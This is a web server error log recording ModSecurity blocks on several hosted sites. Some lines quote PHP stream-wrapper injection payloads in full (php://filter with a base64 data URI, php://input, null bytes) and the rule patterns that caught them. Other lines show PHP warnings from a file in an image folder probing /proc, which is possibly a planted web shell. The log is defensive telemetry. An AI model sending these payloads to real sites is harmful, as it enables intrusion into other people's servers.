[hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bgAAAVA"]
[Tue May 12 05:06:16.018338 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bgAAAVA"]
[Tue May 12 05:06:16.018557 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bgAAAVA"]
[Tue May 12 05:06:16.119616 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bwAAAVA"]
[Tue May 12 05:06:16.119670 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bwAAAVA"]
[Tue May 12 05:06:16.119965 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg==\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bwAAAVA"]
[Tue May 12 05:06:16.120103 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bwAAAVA"]
[Tue May 12 05:06:16.120560 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bwAAAVA"]
[Tue May 12 05:06:16.120783 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bwAAAVA"]
[Tue May 12 05:06:17.276677 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKTue9Sp-pIv_Bb68dwAAAVA"]
[Tue May 12 05:06:17.276736 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKTue9Sp-pIv_Bb68dwAAAVA"]
[Tue May 12 05:06:17.277487 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKTue9Sp-pIv_Bb68dwAAAVA"]
[Tue May 12 05:06:17.277733 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKTue9Sp-pIv_Bb68dwAAAVA"]
[Tue May 12 05:06:18.583660 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gAAAAVA"]
[Tue May 12 05:06:18.583713 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gAAAAVA"]
[Tue May 12 05:06:18.584462 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gAAAAVA"]
[Tue May 12 05:06:18.584721 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gAAAAVA"]
[Tue May 12 05:06:18.680618 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS:url: php://input"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gQAAAVA"]
[Tue May 12 05:06:18.681141 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gQAAAVA"]
[Tue May 12 05:06:18.681405 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68gQAAAVA"]
[Tue May 12 05:06:18.776768 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68ggAAAVA"]
[Tue May 12 05:06:18.776821 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68ggAAAVA"]
[Tue May 12 05:06:18.777183 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS:url: php://input\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68ggAAAVA"]
[Tue May 12 05:06:18.777681 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68ggAAAVA"]
[Tue May 12 05:06:18.777952 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKjue9Sp-pIv_Bb68ggAAAVA"]
[Tue May 12 05:06:52.357002 2026] [security2:error] [pid 1808852:tid 1808865] [client 170.106.180.246:55766] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pweil.com"] [uri "/"] [unique_id "agKZTBfeipD4uoG21FopmwAAAAo"]
PHP Warning:  filesize(): stat failed for /proc/694/task/694/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/694/task/694/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/694/task/694/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/694/task/694/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/694/task/694/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/694/task/694/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:08:04.535967 2026] [:error] [pid 1825179:tid 1825197] [client 40.77.167.2:44880] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:08:16.692602 2026] [ssl:error] [pid 1825179:tid 1825205] (EAI 2)Name or service not known: [client 66.249.69.106:36642] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:08:16.692669 2026] [ssl:error] [pid 1825179:tid 1825205] AH01941: stapling_renew_response: responder error
[Tue May 12 05:08:17.126925 2026] [ssl:error] [pid 1730175:tid 1730196] (EAI 2)Name or service not known: [client 66.249.69.96:50914] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:08:17.126951 2026] [ssl:error] [pid 1730175:tid 1730196] AH01941: stapling_renew_response: responder error
[Tue May 12 05:08:18.895521 2026] [security2:error] [pid 1820198:tid 1820205] [client 43.154.140.188:34792] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKZos1tk6y7yBJLpJoy2gAAAIU"]
PHP Warning:  filesize(): stat failed for /proc/109/task/109/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/109/task/109/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/109/task/109/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/109/task/109/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/109/task/109/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/109/task/109/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:08:27.485848 2026] [security2:error] [pid 1825179:tid 1825201] [client 170.106.193.108:42766] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/lecteur-heureux/"] [unique_id "agKZq9r1yOh9TvizeziYJgAAAEM"]
[Tue May 12 05:08:43.962432 2026] [security2:error] [pid 1825179:tid 1825197] [client 129.226.83.4:58060] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agKZu9r1yOh9TvizeziYMwAAAEA"]
[Tue May 12 05:08:50.134467 2026] [security2:error] [pid 1820198:tid 1820212] [client 129.226.83.4:39810] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/roue-libre/"] [unique_id "agKZws1tk6y7yBJLpJoy6wAAAIw"], referer: https://www.maelbailly.fr/?p=593
[Tue May 12 05:09:03.305511 2026] [security2:error] [pid 1730207:tid 1730229] [client 162.62.213.165:55472] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nouveau-visuel-flb/"] [unique_id "agKZzzue9Sp-pIv_Bb684AAAAVQ"]
[Tue May 12 05:09:06.171335 2026] [security2:error] [pid 1730207:tid 1730211] [client 43.134.51.171:51810] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZ0jue9Sp-pIv_Bb684QAAAUI"]
[Tue May 12 05:09:35.106823 2026] [security2:error] [pid 1820198:tid 1820219] [client 216.73.216.117:32662] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: c8c6c05ac7fa52ec6f1efcdd9ca2954a||1778557174||1778556814"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agKZ781tk6y7yBJLpJozAwAAAJM"]
[Tue May 12 05:09:35.107046 2026] [security2:error] [pid 1820198:tid 1820219] [client 216.73.216.117:32662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agKZ781tk6y7yBJLpJozAwAAAJM"]
[Tue May 12 05:09:35.463713 2026] [security2:error] [pid 1820198:tid 1820219] [client 216.73.216.117:32662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKZ781tk6y7yBJLpJozAwAAAJM"]
[Tue May 12 05:10:11.293849 2026] [ssl:error] [pid 1730175:tid 1730179] (EAI 2)Name or service not known: [client 199.45.155.97:32332] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:10:11.293933 2026] [ssl:error] [pid 1730175:tid 1730179] AH01941: stapling_renew_response: responder error
[Tue May 12 05:10:13.716861 2026] [ssl:error] [pid 1730207:tid 1730212] (EAI 2)Name or service not known: [client 199.45.155.97:32360] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:10:13.716913 2026] [ssl:error] [pid 1730207:tid 1730212] AH01941: stapling_renew_response: responder error
